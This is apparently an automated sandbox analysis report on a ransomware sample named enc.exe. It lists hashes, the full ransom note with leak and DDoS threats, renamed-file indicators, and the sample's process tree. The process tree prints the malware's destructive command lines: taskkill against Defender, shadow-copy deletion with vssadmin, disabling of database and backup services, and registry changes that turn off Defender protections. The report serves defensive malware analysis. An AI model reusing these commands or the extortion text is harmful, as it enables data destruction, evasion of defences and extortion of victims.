Analysis
-
max time kernel
4265020s -
max time network
68s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220113 -
submitted
15/01/2022, 12:32
Static task
static1
Behavioral task
behavioral1
Sample
enc.exe
Resource
win7-en-20211208
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
enc.exe
Resource
win10v2004-en-20220113
windows10-2004_x64
0 signatures
0 seconds
General
-
Target
enc.exe
-
Size
156KB
-
MD5
14ee62fcc9163509856671400429ad55
-
SHA1
7544332b52769ca853d900669ef5e272a2ae1665
-
SHA256
699159e695e230a48d94b6103b48940ed596d0b48fb6d936c04d86eed539cecd
-
SHA512
4d71c87be6f6ad7c9f3277b60850cd7136cecfd5f15621d1e56b1897008da8cc742578112ea955f8417c8d4cf13bcfb92e7ceafb34720017b47d81c4d2603bff
Score
10/10
Malware Config
Extracted
Path
C:\Documents and Settings\WANNA_RECOVER_KOXIC_FILEZ_KFKHP.txt
Ransom Note
--=== Hello. ===---
[+] Whats Happen? [+]
Your files are encrypted, and currently unavailable.
All sensitive information also leaked.
By the way, everything is possible to recover (restore), but you need to follow our instructions.
Otherwise, you cant return your data (NEVER).
[+] What guarantees? [+]
Its just a business. We absolutely do not care about you and your deals, except getting benefits.
If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests.
To check the ability of returning files, You should send sample to us to decrypt one file for free. That is our guarantee.
If you will not cooperate with our service - for us, its does not matter.
But you will lose your time and data, cause just we have the private key.
In practise-time is much more valuable than money.
[+] How to contact us? [+]
You have two ways:
1) [Recommended] Using an email
Just write us an email to [email protected]
2) Quick contact with us or if you will not receive our letters download qTox and ADD our TOXID:
F3C777D22A0686055A3558917315676D607026B680DA5C8D3D4D887017A2A844F546AE59F59F
How to download QTOX:
- https://tox.chat/download.html
- https://github.com/qTox/qTox/releases/download/v1.17.3/setup-qtox-x86_64-release.exe
Add our mails to contacts so as not to lose letters from us.
Check your spam sometimes, our emails may get there.
[+] Consequences if we do not find a common language [+]
1. The data were irretrievably lost.
2. Leaked data will be published or sold on blmarket (or to competitors).
3. In some cases, DDOS attacks will be applied to your inftastructure.
!!! DANGER !!!
DONT try to change files by yourself, DONT use any third party software for restoring your data or
antivirus solutions - its may entail damge of the private key and, as result, The Loss all data.
!!! !!! !!!
ONE MORE TIME: Its in your interests to get your files back.
From our side, we (the best specialists) make everything for restoring, but please should not interfere.
!!! !!! !!!
Your UserID:
A8DAA6A16D8C8BB312F43209F7AB95E5296A10A3D87024CB934A585CB5507644CB5E6A77BC8280358F92FAEC6E4E930722214A95E70C211752067D825DF7BEF09C0A7FDE70F8AAFE6E29B2B935D40DCE664D830E118C38182BE7C9395FFFCE5CAC105B1CF2112639BC49E8177B22ADAC766C2B6222FC985C6828E7908EB8436672CDE2A3767C5C90007FDCC9FCAFE356EFB2D13759DCF330C325F0795184B169A98D0CA85DF495083ED5F5A9682B433202D4D32434F58AF3C48AEEA6AD7804648CD109D13DBCA7850DDFD357A6DC2607E268298B5EE920E583DFFA0158C3A6B6BCA0CE48997B683086A920023EBA8F671F7F117802128A12EC741C66D86CD0B63082010A0282010100B82716F0ADD557A53005A5A7C413681A0589B311245C52F35CDE173723523E067D7B27380E11E6E9B1F6D1A8A89294E1966D9FBDA22976D3091AF91D7FFD18A9746440BEF74B05CF88707106D16D3019F124F633EC1A5E6615BB0555788AED81105CB6C835CF58721295A1C60E595604308160C43ED863A1170593FA7E031FBB018C6EB90B039A6A6DC6E98A0494924EC66C9292E4C4261C8823B5E9D892AF1E095DD3096E68A119330D0C7D1E909EF08A9627B46E899D7DB9724BC3B7AF8D4B732C4233EDBFE86493ED0B7286E47A930783D9762C583EA19965EACE30D4C11A6EBF588FFC9BF677D95782B1EADACE7EF731E3D69A3E01E2486C8361BD5B5B6702030100012DEF1E66AEBA0015F148138EF6EE89584B464B4850
Emails
URLs
https://tox.chat/download.html
https://github.com/qTox/qTox/releases/download/v1.17.3/setup-qtox-x86_64-release.exe
Signatures
-
Disables taskbar notifications via registry modification
-
Modifies extensions of user files 10 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File opened for modification C:\Users\Admin\Pictures\TraceConnect.tif.KOXIC_KFKHP enc.exe File renamed C:\Users\Admin\Pictures\MeasureRename.png => C:\Users\Admin\Pictures\MeasureRename.png.KOXIC_KFKHP enc.exe File opened for modification C:\Users\Admin\Pictures\CheckpointJoin.tif.KOXIC_KFKHP enc.exe File renamed C:\Users\Admin\Pictures\TraceConnect.tif => C:\Users\Admin\Pictures\TraceConnect.tif.KOXIC_KFKHP enc.exe File opened for modification C:\Users\Admin\Pictures\RevokeSet.png.KOXIC_KFKHP enc.exe File opened for modification C:\Users\Admin\Pictures\MeasureRename.png.KOXIC_KFKHP enc.exe File renamed C:\Users\Admin\Pictures\CompleteMeasure.png => C:\Users\Admin\Pictures\CompleteMeasure.png.KOXIC_KFKHP enc.exe File renamed C:\Users\Admin\Pictures\CheckpointJoin.tif => C:\Users\Admin\Pictures\CheckpointJoin.tif.KOXIC_KFKHP enc.exe File opened for modification C:\Users\Admin\Pictures\CompleteMeasure.png.KOXIC_KFKHP enc.exe File renamed C:\Users\Admin\Pictures\RevokeSet.png => C:\Users\Admin\Pictures\RevokeSet.png.KOXIC_KFKHP enc.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\DisableBlockAtFirstSeen = "1" enc.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\LocalSettingOverrideSpynetReporting = "0" enc.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "2" enc.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\UX Configuration enc.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\UX Configuration\NotificationSuppress = "1" enc.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features enc.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtectione = "0" enc.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet enc.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\cs-cz\ui-strings.js.KOXIC_KFKHP enc.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\rhp_world_icon_hover.png.KOXIC_KFKHP enc.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_sv.properties.KOXIC_KFKHP enc.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-attach.xml.KOXIC_KFKHP enc.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-common_ja.jar.KOXIC_KFKHP enc.exe File created C:\Program Files\Microsoft Office\root\Office16\FPA_FA000000050\WANNA_RECOVER_KOXIC_FILEZ_KFKHP.txt enc.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\StandardR_Trial-ppd.xrm-ms.KOXIC_KFKHP enc.exe File created C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Car\RTL\contrast-white\WANNA_RECOVER_KOXIC_FILEZ_KFKHP.txt enc.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\fr-fr\ui-strings.js.KOXIC_KFKHP enc.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\checkmark-2x.png.KOXIC_KFKHP enc.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\WANNA_RECOVER_KOXIC_FILEZ_KFKHP.txt enc.exe File created C:\Program Files\WindowsPowerShell\Modules\PackageManagement\WANNA_RECOVER_KOXIC_FILEZ_KFKHP.txt enc.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\AddressBook2x.png.KOXIC_KFKHP enc.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\[email protected]_KFKHP enc.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogoSmall.contrast-black_scale-140.png.KOXIC_KFKHP enc.exe File created C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\Voices\beeps\WANNA_RECOVER_KOXIC_FILEZ_KFKHP.txt enc.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ko-kr\WANNA_RECOVER_KOXIC_FILEZ_KFKHP.txt enc.exe File opened for modification C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Functions\In.Tests.ps1.KOXIC_KFKHP enc.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\client-issuance-root.xrm-ms.KOXIC_KFKHP enc.exe File created C:\Program Files (x86)\Common Files\System\en-US\WANNA_RECOVER_KOXIC_FILEZ_KFKHP.txt enc.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\AXIS\WANNA_RECOVER_KOXIC_FILEZ_KFKHP.txt enc.exe File created C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_x64__8wekyb3d8bbwe\Win10\Classic\WANNA_RECOVER_KOXIC_FILEZ_KFKHP.txt enc.exe File created C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_neutral_~_kzf8qxf38zg5c\WANNA_RECOVER_KOXIC_FILEZ_KFKHP.txt enc.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusEDUR_SubTrial-pl.xrm-ms.KOXIC_KFKHP enc.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Retail3-ul-oob.xrm-ms.KOXIC_KFKHP enc.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_OEM_Perp-ul-oob.xrm-ms.KOXIC_KFKHP enc.exe File opened for modification C:\Program Files\Microsoft Office\root\rsod\osmux.x-none.msi.16.x-none.tree.dat.KOXIC_KFKHP enc.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_neutral_~_8wekyb3d8bbwe\AppxSignature.p7x.KOXIC_KFKHP enc.exe File created C:\Program Files\WindowsPowerShell\Configuration\WANNA_RECOVER_KOXIC_FILEZ_KFKHP.txt enc.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Orange.xml.KOXIC_KFKHP enc.exe File created C:\Program Files\Microsoft Office\PackageManifests\WANNA_RECOVER_KOXIC_FILEZ_KFKHP.txt enc.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_2019.716.2313.0_neutral_~_8wekyb3d8bbwe\AppxBlockMap.xml.KOXIC_KFKHP enc.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\js\selector.js.KOXIC_KFKHP enc.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\rhp_world_icon.png.KOXIC_KFKHP enc.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT.KOXIC_KFKHP enc.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\jawt.lib.KOXIC_KFKHP enc.exe File created C:\Program Files\Windows Media Player\en-US\WANNA_RECOVER_KOXIC_FILEZ_KFKHP.txt enc.exe File created C:\Program Files\WindowsApps\Microsoft.VCLibs.140.00.UWPDesktop_14.0.27629.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\WANNA_RECOVER_KOXIC_FILEZ_KFKHP.txt enc.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Excel2019R_OEM_Perp-pl.xrm-ms.KOXIC_KFKHP enc.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\WANNA_RECOVER_KOXIC_FILEZ_KFKHP.txt enc.exe File opened for modification C:\Program Files (x86)\Common Files\System\ado\ja-JP\msader15.dll.mui.KOXIC_KFKHP enc.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\sv-se\ui-strings.js.KOXIC_KFKHP enc.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\sunpkcs11.jar.KOXIC_KFKHP enc.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\sdxs.xml.KOXIC_KFKHP enc.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\am\LC_MESSAGES\vlc.mo.KOXIC_KFKHP enc.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\shellext.dll.mui.KOXIC_KFKHP enc.exe File created C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsStore_11910.1002.5.0_neutral_split.scale-100_8wekyb3d8bbwe\microsoft.system.package.metadata\WANNA_RECOVER_KOXIC_FILEZ_KFKHP.txt enc.exe File opened for modification C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Functions\Coverage.ps1.KOXIC_KFKHP enc.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.directorywatcher.nl_ja_4.4.0.v20140623020002.jar.KOXIC_KFKHP enc.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.contrast-black_scale-100.png.KOXIC_KFKHP enc.exe File created C:\Program Files\Windows NT\Accessories\WANNA_RECOVER_KOXIC_FILEZ_KFKHP.txt enc.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProO365R_SubTest-pl.xrm-ms.KOXIC_KFKHP enc.exe File created C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\WANNA_RECOVER_KOXIC_FILEZ_KFKHP.txt enc.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_link_18.svg.KOXIC_KFKHP enc.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\cs-cz\ui-strings.js.KOXIC_KFKHP enc.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\fr-ma\ui-strings.js.KOXIC_KFKHP enc.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_classic_winxp.css.KOXIC_KFKHP enc.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\.lastModified.KOXIC_KFKHP enc.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_x64__8wekyb3d8bbwe\AppxMetadata\CodeIntegrity.cat enc.exe File created C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Car\LTR\WANNA_RECOVER_KOXIC_FILEZ_KFKHP.txt enc.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_sortedby_selected_18.svg.KOXIC_KFKHP enc.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\themes\dark\WANNA_RECOVER_KOXIC_FILEZ_KFKHP.txt enc.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\dummy\adobe-old-logo.jpg.KOXIC_KFKHP enc.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\org-openide-util.jar.KOXIC_KFKHP enc.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MusNotification.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz MusNotification.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 3924 ipconfig.exe -
Kills process with taskkill 1 IoCs
pid Process 2060 taskkill.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 2916 notepad.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1920 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3608 enc.exe 3608 enc.exe 3608 enc.exe 3608 enc.exe 3608 enc.exe 3608 enc.exe 3608 enc.exe 3608 enc.exe 3608 enc.exe 3608 enc.exe 3608 enc.exe 3608 enc.exe 3608 enc.exe 3608 enc.exe 3608 enc.exe 3608 enc.exe 3608 enc.exe 3608 enc.exe 3608 enc.exe 3608 enc.exe 3608 enc.exe 3608 enc.exe 3608 enc.exe 3608 enc.exe 3608 enc.exe 3608 enc.exe 3608 enc.exe 3608 enc.exe 3608 enc.exe 3608 enc.exe 3608 enc.exe 3608 enc.exe 3608 enc.exe 3608 enc.exe 3608 enc.exe 3608 enc.exe 3608 enc.exe 3608 enc.exe 3608 enc.exe 3608 enc.exe 3608 enc.exe 3608 enc.exe 3608 enc.exe 3608 enc.exe 3608 enc.exe 3608 enc.exe 3608 enc.exe 3608 enc.exe 3608 enc.exe 3608 enc.exe 3608 enc.exe 3608 enc.exe 3608 enc.exe 3608 enc.exe 3608 enc.exe 3608 enc.exe 3608 enc.exe 3608 enc.exe 3608 enc.exe 3608 enc.exe 3608 enc.exe 3608 enc.exe 3608 enc.exe 3608 enc.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2060 taskkill.exe Token: SeBackupPrivilege 3608 enc.exe Token: SeRestorePrivilege 3608 enc.exe Token: SeManageVolumePrivilege 3608 enc.exe Token: SeTakeOwnershipPrivilege 3608 enc.exe Token: SeIncreaseQuotaPrivilege 2084 WMIC.exe Token: SeSecurityPrivilege 2084 WMIC.exe Token: SeTakeOwnershipPrivilege 2084 WMIC.exe Token: SeLoadDriverPrivilege 2084 WMIC.exe Token: SeSystemProfilePrivilege 2084 WMIC.exe Token: SeSystemtimePrivilege 2084 WMIC.exe Token: SeProfSingleProcessPrivilege 2084 WMIC.exe Token: SeIncBasePriorityPrivilege 2084 WMIC.exe Token: SeCreatePagefilePrivilege 2084 WMIC.exe Token: SeBackupPrivilege 2084 WMIC.exe Token: SeRestorePrivilege 2084 WMIC.exe Token: SeShutdownPrivilege 2084 WMIC.exe Token: SeDebugPrivilege 2084 WMIC.exe Token: SeSystemEnvironmentPrivilege 2084 WMIC.exe Token: SeRemoteShutdownPrivilege 2084 WMIC.exe Token: SeUndockPrivilege 2084 WMIC.exe Token: SeManageVolumePrivilege 2084 WMIC.exe Token: 33 2084 WMIC.exe Token: 34 2084 WMIC.exe Token: 35 2084 WMIC.exe Token: 36 2084 WMIC.exe Token: SeIncreaseQuotaPrivilege 2084 WMIC.exe Token: SeSecurityPrivilege 2084 WMIC.exe Token: SeTakeOwnershipPrivilege 2084 WMIC.exe Token: SeLoadDriverPrivilege 2084 WMIC.exe Token: SeSystemProfilePrivilege 2084 WMIC.exe Token: SeSystemtimePrivilege 2084 WMIC.exe Token: SeProfSingleProcessPrivilege 2084 WMIC.exe Token: SeIncBasePriorityPrivilege 2084 WMIC.exe Token: SeCreatePagefilePrivilege 2084 WMIC.exe Token: SeBackupPrivilege 2084 WMIC.exe Token: SeRestorePrivilege 2084 WMIC.exe Token: SeShutdownPrivilege 2084 WMIC.exe Token: SeDebugPrivilege 2084 WMIC.exe Token: SeSystemEnvironmentPrivilege 2084 WMIC.exe Token: SeRemoteShutdownPrivilege 2084 WMIC.exe Token: SeUndockPrivilege 2084 WMIC.exe Token: SeManageVolumePrivilege 2084 WMIC.exe Token: 33 2084 WMIC.exe Token: 34 2084 WMIC.exe Token: 35 2084 WMIC.exe Token: 36 2084 WMIC.exe Token: SeIncreaseQuotaPrivilege 1544 WMIC.exe Token: SeSecurityPrivilege 1544 WMIC.exe Token: SeTakeOwnershipPrivilege 1544 WMIC.exe Token: SeLoadDriverPrivilege 1544 WMIC.exe Token: SeSystemProfilePrivilege 1544 WMIC.exe Token: SeSystemtimePrivilege 1544 WMIC.exe Token: SeProfSingleProcessPrivilege 1544 WMIC.exe Token: SeIncBasePriorityPrivilege 1544 WMIC.exe Token: SeCreatePagefilePrivilege 1544 WMIC.exe Token: SeBackupPrivilege 1544 WMIC.exe Token: SeRestorePrivilege 1544 WMIC.exe Token: SeShutdownPrivilege 1544 WMIC.exe Token: SeDebugPrivilege 1544 WMIC.exe Token: SeSystemEnvironmentPrivilege 1544 WMIC.exe Token: SeRemoteShutdownPrivilege 1544 WMIC.exe Token: SeUndockPrivilege 1544 WMIC.exe Token: SeManageVolumePrivilege 1544 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3608 wrote to memory of 2220 3608 enc.exe 54 PID 3608 wrote to memory of 2220 3608 enc.exe 54 PID 3608 wrote to memory of 2220 3608 enc.exe 54 PID 2220 wrote to memory of 2060 2220 cmd.exe 56 PID 2220 wrote to memory of 2060 2220 cmd.exe 56 PID 2220 wrote to memory of 2060 2220 cmd.exe 56 PID 3608 wrote to memory of 3276 3608 enc.exe 57 PID 3608 wrote to memory of 3276 3608 enc.exe 57 PID 3608 wrote to memory of 3276 3608 enc.exe 57 PID 3608 wrote to memory of 3408 3608 enc.exe 59 PID 3608 wrote to memory of 3408 3608 enc.exe 59 PID 3608 wrote to memory of 3408 3608 enc.exe 59 PID 3608 wrote to memory of 3228 3608 enc.exe 61 PID 3608 wrote to memory of 3228 3608 enc.exe 61 PID 3608 wrote to memory of 3228 3608 enc.exe 61 PID 3228 wrote to memory of 2084 3228 cmd.exe 63 PID 3228 wrote to memory of 2084 3228 cmd.exe 63 PID 3228 wrote to memory of 2084 3228 cmd.exe 63 PID 3608 wrote to memory of 2256 3608 enc.exe 64 PID 3608 wrote to memory of 2256 3608 enc.exe 64 PID 3608 wrote to memory of 2256 3608 enc.exe 64 PID 3608 wrote to memory of 780 3608 enc.exe 66 PID 3608 wrote to memory of 780 3608 enc.exe 66 PID 3608 wrote to memory of 780 3608 enc.exe 66 PID 780 wrote to memory of 1544 780 cmd.exe 68 PID 780 wrote to memory of 1544 780 cmd.exe 68 PID 780 wrote to memory of 1544 780 cmd.exe 68 PID 3608 wrote to memory of 1308 3608 enc.exe 69 PID 3608 wrote to memory of 1308 3608 enc.exe 69 PID 3608 wrote to memory of 1308 3608 enc.exe 69 PID 3608 wrote to memory of 3460 3608 enc.exe 71 PID 3608 wrote to memory of 3460 3608 enc.exe 71 PID 3608 wrote to memory of 3460 3608 enc.exe 71 PID 3460 wrote to memory of 3588 3460 cmd.exe 73 PID 3460 wrote to memory of 3588 3460 cmd.exe 73 PID 3460 wrote to memory of 3588 3460 cmd.exe 73 PID 3608 wrote to memory of 3280 3608 enc.exe 74 PID 3608 wrote to memory of 3280 3608 enc.exe 74 PID 3608 wrote to memory of 3280 3608 enc.exe 74 PID 3608 wrote to memory of 3872 3608 enc.exe 76 PID 3608 wrote to memory of 3872 3608 enc.exe 76 PID 3608 wrote to memory of 3872 3608 enc.exe 76 PID 3872 wrote to memory of 2972 3872 cmd.exe 78 PID 3872 wrote to memory of 2972 3872 cmd.exe 78 PID 3872 wrote to memory of 2972 3872 cmd.exe 78 PID 3608 wrote to memory of 3200 3608 enc.exe 79 PID 3608 wrote to memory of 3200 3608 enc.exe 79 PID 3608 wrote to memory of 3200 3608 enc.exe 79 PID 3608 wrote to memory of 768 3608 enc.exe 81 PID 3608 wrote to memory of 768 3608 enc.exe 81 PID 3608 wrote to memory of 768 3608 enc.exe 81 PID 768 wrote to memory of 2976 768 cmd.exe 83 PID 768 wrote to memory of 2976 768 cmd.exe 83 PID 768 wrote to memory of 2976 768 cmd.exe 83 PID 3608 wrote to memory of 2244 3608 enc.exe 85 PID 3608 wrote to memory of 2244 3608 enc.exe 85 PID 3608 wrote to memory of 2244 3608 enc.exe 85 PID 3608 wrote to memory of 1372 3608 enc.exe 87 PID 3608 wrote to memory of 1372 3608 enc.exe 87 PID 3608 wrote to memory of 1372 3608 enc.exe 87 PID 1372 wrote to memory of 1960 1372 cmd.exe 89 PID 1372 wrote to memory of 1960 1372 cmd.exe 89 PID 1372 wrote to memory of 1960 1372 cmd.exe 89 PID 3608 wrote to memory of 3344 3608 enc.exe 90
Processes
-
C:\Users\Admin\AppData\Local\Temp\enc.exe"C:\Users\Admin\AppData\Local\Temp\enc.exe"1⤵
- Modifies extensions of user files
- Windows security modification
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3608 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /F /IM MSASCuiL.exe taskkill /F /IM MSMpeng.exe taskkill /F /IM msseces.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2220 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM MSASCuiL.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2060
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin delete shadows /all /quiet sc config browser sc config browser start=enabled sc stop vss sc config vss start=disabled sc stop MongoDB sc config MongoDB start=disabled sc stop SQLWriter sc config SQLWriter start=disabled sc stop MSSQLServerOLAPService sc config MSSQLServerOLAPService start=disabled sc stop MSSQLSERVER sc config MSSQLSERVER start=disabled sc stop MSSQL$SQLEXPRESS sc config MSSQL$SQLEXPRESS start=disabled sc stop ReportServer sc config ReportServer start=disabled sc stop OracleServiceORCL sc config OracleServiceORCL start=disabled sc stop OracleDBConsoleorcl sc config OracleDBConsoleorcl start=disabled sc stop OracleMTSRecoveryService sc config OracleMTSRecoveryService start=disabled sc stop OracleVssWriterORCL sc config OracleVssWriterORCL start=disabled sc stop MySQL sc config MySQL start=disabled2⤵PID:3276
-
-
C:\Windows\SysWOW64\cmd.execmd /c "echo OS INFO: > %TEMP%\DHPMDAPUF"2⤵PID:3408
-
-
C:\Windows\SysWOW64\cmd.execmd /c "wmic OS get Caption,CSDVersion,OSArchitecture,Version >> %TEMP%\DHPMDAPUF"2⤵
- Suspicious use of WriteProcessMemory
PID:3228 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic OS get Caption,CSDVersion,OSArchitecture,Version3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2084
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c "echo BIOS INFO: >> %TEMP%\DHPMDAPUF"2⤵PID:2256
-
-
C:\Windows\SysWOW64\cmd.execmd /c "wmic BIOS get Manufacturer, Name, SMBIOSBIOSVersion, Version >> %TEMP%\DHPMDAPUF"2⤵
- Suspicious use of WriteProcessMemory
PID:780 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic BIOS get Manufacturer, Name, SMBIOSBIOSVersion, Version3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1544
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c "echo CPU INFO: >> %TEMP%\DHPMDAPUF"2⤵PID:1308
-
-
C:\Windows\SysWOW64\cmd.execmd /c "wmic CPU get Name, NumberOfCores, NumberOfLogicalProcessors >> %TEMP%\DHPMDAPUF"2⤵
- Suspicious use of WriteProcessMemory
PID:3460 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic CPU get Name, NumberOfCores, NumberOfLogicalProcessors3⤵PID:3588
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c "echo MEMPHYSICAL INFO: >> %TEMP%\DHPMDAPUF"2⤵PID:3280
-
-
C:\Windows\SysWOW64\cmd.execmd /c "wmic MEMPHYSICAL get MaxCapacity >> %TEMP%\DHPMDAPUF"2⤵
- Suspicious use of WriteProcessMemory
PID:3872 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic MEMPHYSICAL get MaxCapacity3⤵PID:2972
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c "echo MEMORYCHIP: INFO >> %TEMP%\DHPMDAPUF"2⤵PID:3200
-
-
C:\Windows\SysWOW64\cmd.execmd /c "wmic MEMORYCHIP get Capacity, DeviceLocator, PartNumber, Tag >> %TEMP%\DHPMDAPUF"2⤵
- Suspicious use of WriteProcessMemory
PID:768 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic MEMORYCHIP get Capacity, DeviceLocator, PartNumber, Tag3⤵PID:2976
-
-
-
